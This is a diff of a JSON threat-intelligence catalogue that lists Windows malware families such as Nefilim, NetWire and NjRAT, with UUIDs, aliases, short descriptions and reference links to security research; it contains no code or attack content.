"https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", "https://blogs.microsoft.com/on-the-issues/2020/03/10/necurs-botnet-cyber-crime-disrupt/", "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://cofense.com/necurs-targeting-banks-pub-file-drops-flawedammyy/", @@ -22454,31 +25677,40 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nefilim", - "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", + "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html", "https://www.picussecurity.com/resource/blog/how-to-beat-nefilim-ransomware-attacks", - "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", + "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/", + "https://intel471.com/blog/how-cybercriminals-create-turbulence-for-the-transportation-industry", + "https://securelist.com/evolution-of-jsworm-ransomware/102428/", + "https://documents.trendmicro.com/assets/white_papers/wp-modern-ransomwares-double-extortion-tactics.pdf", + "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/", + "https://www.trendmicro.com/en_us/research/21/f/nefilim-modern-ransomware-attack-story.html", + "http://www.secureworks.com/research/threat-profiles/gold-mansard", + "https://blog.qualys.com/vulnerabilities-research/2021/05/12/nefilim-ransomware", "https://www.bleepingcomputer.com/news/security/new-nefilim-ransomware-threatens-to-release-victims-data/", "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html", "https://news.sophos.com/en-us/2021/01/26/nefilim-ransomware-attack-uses-ghost-credentials/", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", - "https://www.trendmicro.com/en_us/research/21/b/nefilim-ransomware.html", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/", + "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf", + "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://id-ransomware.blogspot.com/2020/03/nefilim-ransomware.html", "https://us-cert.cisa.gov/ncas/alerts/aa20-345a", - "https://www.bleepingcomputer.com/news/security/home-appliance-giant-whirlpool-hit-in-nefilim-ransomware-attack/", - "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data", - "https://www.cert.govt.nz/it-specialists/advisories/active-ransomware-campaign-leveraging-remote-access-technologies/", - "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/" + "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/nefilim-ransomware-threatens-to-expose-stolen-data" ], "synonyms": [ - "Nephilim Ransomware" + "Nephilim" ], "type": [] }, "uuid": "895f088e-a862-462c-a754-6593c6a471da", - "value": "Nefilim Ransomware" + "value": "Nefilim" }, { "description": "", @@ -22501,23 +25733,28 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.nemty", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", "https://www.bleepingcomputer.com/news/security/fake-paypal-site-spreads-nemty-ransomware/", - "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html", "https://www.bleepingcomputer.com/news/security/three-more-ransomware-families-create-sites-to-leak-stolen-data/", - "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", - "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/", "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/nemty-ransomware-learning-by-doing/", - "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/", - "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw", - "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", - "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/", - "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/", "https://www.lastline.com/labsblog/nemty-ransomware-scaling-up-apac-mailboxes-swarmed-dual-downloaders/", - "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md", + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/", + "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", + "https://securelist.com/evolution-of-jsworm-ransomware/102428/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.bleepingcomputer.com/news/security/new-nemty-ransomware-may-spread-via-compromised-rdp-connections/", + "http://www.secureworks.com/research/threat-profiles/gold-mansard", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/nemty-ransomware-trik-botnet", + "https://www.bleepingcomputer.com/news/security/nemty-ransomware-gets-distribution-from-rig-exploit-kit/", + "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2019-08-24-nemty-ransomware-notes.vk.raw", + "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b", + "https://www.fortinet.com/blog/threat-research/nemty-ransomware-early-stage-threat.html", "https://labs.sentinelone.com/meet-nemty-successor-nefilim-nephilim-ransomware/", - "https://medium.com/csis-techblog/the-nemty-affiliate-model-13f5cf7ab66b" + "https://github.com/albertzsigovits/malware-notes/blob/master/Nemty.md", + "https://www.bleepingcomputer.com/news/security/nemty-ransomware-decryptor-released-recover-files-for-free/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://www.tesorion.nl/nemty-update-decryptors-for-nemty-1-5-and-1-6/" ], "synonyms": [], "type": [] @@ -22587,6 +25824,23 @@ "uuid": "3bb8052e-8ed2-48e3-a2cf-7358bae8c6b5", "value": "NETEAGLE" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.netfilter", + "https://msrc-blog.microsoft.com/2021/06/25/investigating-and-mitigating-malicious-drivers/", + "https://www.gdatasoftware.com/blog/microsoft-signed-a-malicious-netfilter-rootkit", + "https://blog.360totalsecurity.com/en/netfilter-rootkit-ii-continues-to-hold-whql-signatures/", + "https://www.intezer.com/blog/malware-analysis/fast-insights-for-a-microsoft-signed-netfilter-rootkit/", + "https://www.vice.com/en/article/pkbzxv/hackers-tricked-microsoft-into-certifying-malware-that-could-spy-on-users" + ], + "synonyms": [], + "type": [] + }, + "uuid": "731d992c-f2e0-4e56-a148-b8df5caee8e3", + "value": "NetfilterRootkit" + }, { "description": "", "meta": { @@ -22668,28 +25922,42 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.netwire", + "https://blog.talosintelligence.com/2021/09/operation-armor-piercer.html", "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://www.circl.lu/pub/tr-23/", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", + "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line", "https://news.drweb.ru/show/?i=13281&c=23", "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/", "https://news.sophos.com/en-us/2020/07/14/raticate-rats-as-service-with-commercial-crypter/?cmp=30728", "https://maskop9.wordpress.com/2019/01/30/analysis-of-netwiredrc-trojan/", "https://www.amnesty.org/en/latest/research/2020/06/india-human-rights-defenders-targeted-by-a-coordinated-spyware-operation/", "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://mp.weixin.qq.com/s/yrDzybPVTbu_9SrZPlSNKA", "https://www.gdatasoftware.com/blog/global-pandemic-remcos-tesla-netwire", + "https://www.zscaler.com/blogs/security-research/look-hydrojiin-campaign", "https://www.secureworks.com/blog/netwire-rat-steals-payment-card-data", "https://blog.vincss.net/2020/03/re011-unpack-crypter-cua-malware-netwire-bang-x64dbg.html", + "https://mp.weixin.qq.com/s/xUM2x89GuB8uP6otN612Fg", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "http://researchcenter.paloaltonetworks.com/2014/08/new-release-decrypting-netwire-c2-traffic/", + "https://drive.google.com/file/d/1dD2sWYES_hrPsoql4G0aVF9ILIxAS4Fd/view", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://decoded.avast.io/adolfstreda/the-tangle-of-wiryjmpers-obfuscation/", + "https://blog.talosintelligence.com/2021/04/a-year-of-fajan-evolution-and-bloomberg.html", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", "https://news.sophos.com/en-us/2020/05/14/raticate/", + "https://yoroi.company/research/new-cyber-operation-targets-italy-digging-into-the-netwire-attack-chain/", "https://context-cdn.washingtonpost.com/notes/prod/default/documents/b19a6f2e-55a1-4915-9c2d-5fae0110418c/note/b463d38b-2384-4bb0-a94b-b1b17223ffd0.", + "https://www.cybereason.com/blog/cybereason-exposes-malware-targeting-us-taxpayers", "https://www.secureworks.com/research/threat-profiles/cobalt-trinity", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", + "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", - "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html" + "http://blog.talosintelligence.com/2017/12/recam-redux-deconfusing-confuserex.html", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "NetWeird", @@ -22727,6 +25995,7 @@ "https://www.virusbulletin.com/virusbulletin/2020/01/vb2019-paper-rich-headers-leveraging-mysterious-artifact-pe-format/", "https://blog.malwarebytes.com/threat-analysis/2015/08/inside-neutrino-botnet-builder/", "https://malwarebreakdown.com/2017/04/03/shadow-server-domains-leads-to-rig-exploit-kit-dropping-smoke-loader-which-downloads-neutrino-bot-aka-kasidet", + "https://web.archive.org/web/20191223034907/http://blog.ptsecurity.com/2019/08/finding-neutrino.html", "https://blog.malwarebytes.com/threat-analysis/2017/02/new-neutrino-bot-comes-in-a-protective-loader/", "https://blog.malwarebytes.com/cybercrime/2017/01/post-holiday-spam-campaign-delivers-neutrino-bot/", "http://blog.trendmicro.com/trendlabs-security-intelligence/credit-card-scraping-kasidet-builder-leads-to-spike-in-detections/", @@ -22821,6 +26090,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.new_ct", "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-express" ], "synonyms": [ @@ -22915,6 +26185,23 @@ "uuid": "e1fb348b-5e2b-4a26-95af-431065498ff5", "value": "Nitol" }, + { + "description": "Ransomware family which requires payment in Discord gift cards (\"Discord Nitro\").", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitro", + "https://github.com/nightfallgt/nitro-ransomware", + "https://twitter.com/malwrhunterteam/status/1430616882231578624", + "https://www.bleepingcomputer.com/news/security/discord-nitro-gift-codes-now-demanded-as-ransomware-payments/" + ], + "synonyms": [ + "Hydra" + ], + "type": [] + }, + "uuid": "a81635fc-7bb7-4cd1-b26c-ea8ce6cb2763", + "value": "win.nitro" + }, { "description": "", "meta": { @@ -22934,36 +26221,53 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.njrat", "https://asec.ahnlab.com/1369", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", "https://github.com/itsKindred/malware-analysis-writeups/blob/master/bashar-bachir-chain/bashar-bachir-analysis.pdf", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/", "https://www.vectra.ai/blogpost/moonlight-middle-east-targeted-attacks", + "https://blog.talosintelligence.com/2021/07/sidecopy.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/new-rats-emerge-from-leaked-njw0rm-source-code/", "https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/592/original/Hashes_IOCs_for_coverage.txt", "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", "https://www.4hou.com/posts/VoPM", "https://blog.sonatype.com/bladabindi-njrat-rat-in-jdb.js-npm-malware", + "https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html", "https://blogs.360.cn/post/APT-C-44.html", "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/", "https://www.secureworks.com/research/threat-profiles/copper-fieldstone", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", + "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html", "http://threatgeek.typepad.com/files/fta-1009---njrat-uncovered-1.pdf", "https://unit42.paloaltonetworks.com/njrat-pastebin-command-and-control", "https://pylos.co/wp-content/uploads/2020/02/Threat-Intelligence-and-the-Limits-of-Malware-Analysis.pdf", "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf", + "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/", "https://malwr-analysis.com/2020/06/21/njrat-malware-analysis/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", + "https://www.seqrite.com/documents/en/white-papers/Whitepaper-OperationSideCopy.pdf", "https://news.sophos.com/en-us/2020/05/14/raticate/", "https://securelist.com/apt-trends-report-q2-2019/91897/", "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-american-entities-with-commodity-rats/BlindEagleIOCList.txt", "https://mp.weixin.qq.com/s/gWOIRNPLVqX761LW8x-S5g", + "https://www.trendmicro.com/en_us/research/21/i/Water-Basilisk-Uses-New-HCrypt-Variant-to-Flood-Victims-with-RAT-Payloads.html", + "https://labs.k7computing.com/?p=21904", "https://www.trendmicro.com/en_us/research/20/i/wind-up-windscribe-vpn-bundled-with-backdoor.html", "https://blog.fortinet.com/2016/11/30/bladabindi-remains-a-constant-threat-by-using-dynamic-dns-services", "https://github.com/threatland/TL-TROJAN/tree/master/TL.RAT/RAT.Win.njRAT", + "https://securityintelligence.com/posts/roboski-global-recovery-automation/", "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/", + "https://blog.talosintelligence.com/2021/08/rat-campaign-targets-latin-america.html", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", + "https://about.fb.com/news/2021/04/taking-action-against-hackers-in-palestine/", "https://ti.360.net/blog/articles/analysis-of-apt-c-27/", - "https://blog.reversinglabs.com/blog/rats-in-the-library" + "https://blog.reversinglabs.com/blog/rats-in-the-library", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/594/original/Network_IOCs_list_for_coverage.txt?1625657479", + "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/591/original/062521_SideCopy_%281%29.pdf", + "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/", + "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols" ], "synonyms": [ "Bladabindi" @@ -22973,6 +26277,19 @@ "uuid": "ff611c24-289e-4f2d-88d2-cfbf771a4e4b", "value": "NjRAT" }, + { + "description": "It's .NET Rat with harcoded key ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nmass", + "https://sebdraven.medium.com/a-net-rat-target-mongolia-9c1439c39bc2" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c0a8dc47-13fa-45d7-b55a-e69d798b3244", + "value": "nmass malware" + }, { "description": "", "meta": { @@ -23002,6 +26319,19 @@ "uuid": "f3cbe9ca-e65e-41af-8eb2-1e9877434124", "value": "Nokki" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer", + "https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a077c784-6bc5-488d-b844-978d8d081390", + "value": "NoxPlayer" + }, { "description": "", "meta": { @@ -23029,12 +26359,27 @@ "uuid": "b9c767c7-a1e8-476a-8032-9686d51df7de", "value": "nRansom" }, + { + "description": "NSFOCUS describes PhantomNugget as a modularized malware toolkit, that was spread using EternalBlue. Payloads included a RAT and a XMRig miner.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.nugget_phantom", + "https://redcanary.com/blog/tracking-driver-inventory-to-expose-rootkits/", + "https://staging.nsfocusglobal.com/wp-content/uploads/2018/10/NuggetPhantom-Analysis-Report-V4.1.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "25a5ded7-6167-4f9a-b55d-9cfc9a9a9f22", + "value": "NuggetPhantom" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.numando", - "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/" + "https://www.welivesecurity.com/2020/10/01/latam-financial-cybercrime-competitors-crime-sharing-ttps/", + "https://www.welivesecurity.com/2021/09/17/numando-latam-banking-trojan/" ], "synonyms": [], "type": [] @@ -23102,9 +26447,11 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oblique_rat", "https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html", + "https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-backdoors-rats-loaders-evasion-techniques", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://securelist.com/transparent-tribe-part-2/98233/", "https://www.secrss.com/articles/24995", + "https://blog.talosintelligence.com/2021/05/transparent-tribe-infra-and-targeting.html", "https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" ], @@ -23263,7 +26610,7 @@ "value": "ONHAT" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oni", @@ -23273,7 +26620,7 @@ "type": [] }, "uuid": "c182f370-4721-4968-a3b1-a7e96ab876df", - "value": "Oni Ransomware" + "value": "Oni" }, { "description": "OnionDuke is a new sophisticated piece of malware distributed by threat actors through a malicious exit node on the Tor anonymity network appears to be related to the notorious MiniDuke, researchers at F-Secure discovered. According to experts, since at least February 2014, the threat actors have also distributed the threat through malicious versions of pirated software hosted on torrent websites. ", @@ -23315,8 +26662,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", - "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/" ], "synonyms": [], @@ -23341,6 +26689,19 @@ "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", "value": "Opachki" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.opensupdater", + "https://blog.google/threat-analysis-group/financially-motivated-actor-breaks-certificate-parsing-avoid-detection/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "03d44ec8-ebb4-4d90-9773-c11f4a7de074", + "value": "OpenSUpdater" + }, { "description": "This entry serves as a placeholder of malware observed during Operation Ghoul. The samples will likely be assigned to their respective families. Some families involved and identified were Alina POS (Katrina variant) and TreasureHunter POS.", "meta": { @@ -23401,6 +26762,7 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", "https://blog.talosintelligence.com/2019/08/rat-ratatouille-revrat-orcus.html", "https://blog.checkpoint.com/2019/02/27/protecting-against-winrar-vulnerabilities/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors", "https://www.canada.ca/en/radio-television-telecommunications/news/2019/03/crtc-and-rcmp-national-division-execute-warrants-in-malware-investigation.html", "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", @@ -23439,8 +26801,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.oski", - "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/", "https://www.cyberark.com/resources/threat-research-blog/meet-oski-stealer-an-in-depth-analysis-of-the-popular-credential-stealer", + "https://labs.bitdefender.com/2020/03/new-router-dns-hijacking-attacks-abuse-bitbucket-to-host-infostealer/", + "https://yoroi.company/research/the-wayback-campaign-a-large-scale-operation-hiding-in-plain-sight/", + "https://drive.google.com/file/d/1c72YIF6JYcEvbFZCrkZO26D9hC3gnyMP/view", "https://twitter.com/albertzsigovits/status/1160874557454131200" ], "synonyms": [], @@ -23454,7 +26818,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.osno", - "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit" + "https://www.gdatasoftware.com/blog/2020/11/36459-babax-stealer-rebrands-to-osno-installs-rootkit", + "https://labs.k7computing.com/?p=21562" ], "synonyms": [ "Babax" @@ -23466,6 +26831,19 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ousaban", + "https://www.welivesecurity.com/2021/05/05/ousaban-private-photo-collection-hidden-cabinet/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6620c7ce-63a2-48db-a584-4c5c516bda13", + "value": "Ousaban" + }, + { + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.outcrypt", @@ -23475,7 +26853,7 @@ "type": [] }, "uuid": "90e5a21a-c058-47a0-aa4d-bffde7ba698e", - "value": "OutCrypt Ransomware" + "value": "OutCrypt" }, { "description": "", @@ -23542,7 +26920,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.owlproxy", - "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20" + "https://lab52.io/blog/chimera-apt-updates-on-its-owlproxy-malware/", + "https://medium.com/cycraft/taiwan-government-targeted-by-multiple-cyberattacks-in-april-2020-3b20cea1dc20", + "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf" ], "synonyms": [], "type": [] @@ -23617,8 +26997,12 @@ "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", "https://www.spamhaus.org/news/article/771/", "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware", "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" @@ -23633,19 +27017,34 @@ }, { "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.panda_stealer", + "https://www.trendmicro.com/en_us/research/21/e/new-panda-stealer-targets-cryptocurrency-wallets-.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "7fa924a9-4d7a-406c-b298-bf3b01557ac8", + "value": "Panda Stealer" + }, + { + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paradise", "https://www.acronis.com/en-us/blog/posts/paradise-ransomware-strikes-again", + "https://therecord.media/source-code-for-paradise-ransomware-leaked-on-hacking-forums/", + "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "https://www.lastline.com/labsblog/iqy-files-and-paradise-ransomware/", - "https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool", - "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/" + "https://marcoramilli.com/2021/08/23/paradise-ransomware-the-builder/", + "https://labs.bitdefender.com/2020/01/paradise-ransomware-decryption-tool" ], "synonyms": [], "type": [] }, "uuid": "4f7e7602-79f8-4eea-8239-fb2d4ceadb9f", - "value": "Paradise Ransomware" + "value": "Paradise" }, { "description": "Parallax is a Remote Access Trojan used by attackers to gain access to a victim's machine. It was involved in one of the many infamous \"coronamalware\" campaigns. Basically, the attackers abused the COVID-19 pandemic news to lure victims into opening themed emails spreading parallax.", @@ -23680,7 +27079,7 @@ "value": "parasite_http" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.passlock", @@ -23690,18 +27089,20 @@ "type": [] }, "uuid": "1e78c732-c2f0-4178-a1f5-ccdab0e2d4b8", - "value": "Passlock Ransomware" + "value": "Passlock" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pay2key", - "https://research.checkpoint.com/2020/ransomware-alert-pay2key/", - "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/", + "https://twitter.com/TrendMicroRSRCH/status/1389422784808378370", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", - "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf" + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://research.checkpoint.com/2020/ransomware-alert-pay2key/", + "https://www.clearskysec.com/wp-content/uploads/2020/12/Pay2Kitten.pdf", + "https://www.bleepingcomputer.com/news/security/intels-habana-labs-hacked-by-pay2key-ransomware-data-stolen/" ], "synonyms": [ "Cobalt" @@ -23717,6 +27118,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pebbledash", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133c", + "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/", "https://malwarenailed.blogspot.com/2020/06/peebledash-lazarus-hiddencobra-rat.html?m=1", "https://blog.reversinglabs.com/blog/hidden-cobra" ], @@ -23741,19 +27143,6 @@ "uuid": "ee450087-00e4-4b59-9ea7-6650d5551ea9", "value": "PeddleCheap" }, - { - "description": "Peppy is a Python-based RAT with the majority of its appearances having similarities or definite overlap with MSIL/Crimson appearances. Peppy communicates to its C&C over HTTP and utilizes SQLite for much of its internal functionality and tracking of exfiltrated files. The primary purpose of Peppy may be the automated exfiltration of potentially interesting files and keylogs. Once 